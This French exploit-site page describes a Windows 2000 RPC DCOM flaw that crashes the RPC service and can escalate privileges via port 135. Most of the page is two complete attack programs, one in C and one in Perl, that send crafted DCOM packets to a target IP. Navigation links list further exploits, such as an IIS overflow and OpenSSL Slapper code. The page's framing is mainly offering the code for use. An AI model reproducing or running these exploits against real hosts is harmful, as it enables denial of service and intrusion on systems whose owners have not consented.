Yacapa .com - Téléchargement Microsoft Windows 2000 RPC DCOM Interface DOS et elevation de privilege - Télécharger des jeux et logiciels Microsoft Windows 2000 RPC DCOM Interface DOS et elevation de privilege

vnunet

Télécharger des jeux et logiciels

VNUNET

SVM

Top Recherche

éCHANGE DE LIENS

Page principale >Exploits

Microsoft Windows 2000 RPC DCOM Interface DOS et elevation de privilege

En envoyant un message veroll� � l'interface DCOM __RemoteGetClassObject, le service RPC crash et tous les services et applications dependant du service RPC deviennent instables.

Si l'attaquant a un compte, il peut alors elever ses privil�ges depuis le port 135.

Systemes Vuln�rables:
* Windows 2000 SP3
* Windows 2000 SP4

Code exploit (C):

# By XFocus.org
#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#include <process.h>
#include <string.h>
#include <winbase.h>

unsigned char bindstr[]={ 0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
0xA0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,
0x00,0x00,0x00,0x00,0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

unsigned char request[]={ 0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x13,0x00,0x00,0x00,
0x90,0x00,0x00,0x00,0x01,0x00,0x03,0x00,0x05,0x00,0x06,0x01,0x00,0x00,0x00,0x00,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,0x31,
0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00};



void main(int argc,char ** argv)
{
    WSADATA WSAData;
 int i;
    SOCKET sock;
    SOCKADDR_IN addr_in;
 
 short port=135;
 unsigned char buf1[0x1000];
 printf("RPC DCOM DOS Vulnerability discoveried by Xfocus.org\n"); printf("Code by FlashSky,Flashsky@xfocus.org,benjurry,benjurry@xfocus.org\n");
 printf("Welcome to http://www.xfocus.net\n");
 if(argc<2)
 {
  printf("useage:%s target\n",argv[0]);
exit(1);
 }


    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);
 
 if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
 if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
 {
  printf("Connect failed.Error:%d",WSAGetLastError());
  return;
 }
 if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
 {
   printf("Send failed.Error:%d\n",WSAGetLastError());
   return;
 }

 i=recv(sock,buf1,1024,MSG_PEEK);
 if (send(sock,request,sizeof(request),0)==SOCKET_ERROR)
 {
   printf("Send failed.Error:%d\n",WSAGetLastError());
   return;
 }
 i=recv(sock,buf1,1024,MSG_PEEK);
}

Exploit code (Perl):
#!/usr/bin/perl -w
# By SecurITeam's Experts
my $bindstr = "\x05\x00\x0B\x03\x10\x00\x00\x00\x48\x00\x00\x00\x7F\x00\x00\x00\xD0\x16\xD0\x16\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x01\x00\xA0\x01\x00\x00\x00\x00\x00\x00\xC0\x00\x00\x00\x00\x00\x00\x46\x00\x00\x00\x00\x04\x5D\x88\x8A\xEB\x1C\xC9\x11\x9F\xE8\x08\x00\x2B\x10\x48\x60\x02\x00\x00\x00";

my $request = "\x05\x00\x00\x03\x10\x00\x00\x00\x48\x00\x00\x00\x13\x00\x00\x00\x90\x00\x00\x00\x01\x00\x03\x00\x05\x00\x06\x01\x00\x00\x00\x00\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x31\x00\x00\x00\x00\x00\x00\x00\x00";

use Socket;
$proto = getprotobyname('tcp');
socket(S, PF_INET, SOCK_STREAM, $proto) || die("Socket problems\n");

$IP = $ARGV[0];
$target = inet_aton($IP);
$paddr = sockaddr_in(135, $target);

connect(S, $paddr) || die "connect: $!";

select(S); $|=1;

print $bindstr;

sleep(2);

print $request;
sleep(2);

select(STDOUT);
close(S);

Exploit fournit par benjurry and SecurITeam Experts.

Les + Lus Dans Cette Catégorie

Code Exploit pour IP Smart Spoofing

Il y a quelques jours, nous vous parlions d'une nouvelle technique de spoofing d'IP. L'exploit suivant vous montre comment le r�aliser.
Suite...

Windows 2000 Server IIS 5.0 .ASP buffer Overflow

Le code ci dessous vous permet de tester si votre serveur est vuln�rable. Cet exploit ASP ouvre le port 1111.
Suite...

Microsoft Windows 2000 RPC DCOM Interface DOS et elevation de privilege

En envoyant un message veroll� � l'interface DCOM __RemoteGetClassObject, le service RPC crash et tous les services et applications dependant du service RPC deviennent instables.
Suite...

Code Exploit OpenSSL (Slapper)

Cet exploit, d�riv� du ver slapper, permet de profiter d'une faille sur OpenSSL
Suite...

Kazaa, Grokster et Morpheus Denie de Service(DoS)

Kazaa, Grokster, et Morpheus souffre d'une faille permettant � une personne d'envoyer un message � une cible determin�e en se faisant passer pour quelqu'un d'autre.
Suite...

Navigation Rapide

Astuces Webmaster

Astuces WINDOWS

Astuces WINDOWS XP

Comment �a marche

DVD / Secret

Evenements

Exploits

Hacking / S�curit�

Hardware

Jeux Vid�o

linux

News

Script(php,java...)

Telephonie/GSM

Virus

L'ACTUALITé SUR VNUNET.FR

» Plus

Télécharger

publicité

Top Recherche

éCHANGE DE LIENS

Microsoft Windows 2000 RPC DCOM Interface DOS et elevation de privilege

Les + Lus Dans Cette Catégorie

Code Exploit pour IP Smart Spoofing

Windows 2000 Server IIS 5.0 .ASP buffer Overflow

Microsoft Windows 2000 RPC DCOM Interface DOS et elevation de privilege

Code Exploit OpenSSL (Slapper)

Kazaa, Grokster et Morpheus Denie de Service(DoS)

Navigation Rapide

L'ACTUALITé SUR VNUNET.FR

Télécharger

VNUNET

Services

Magazines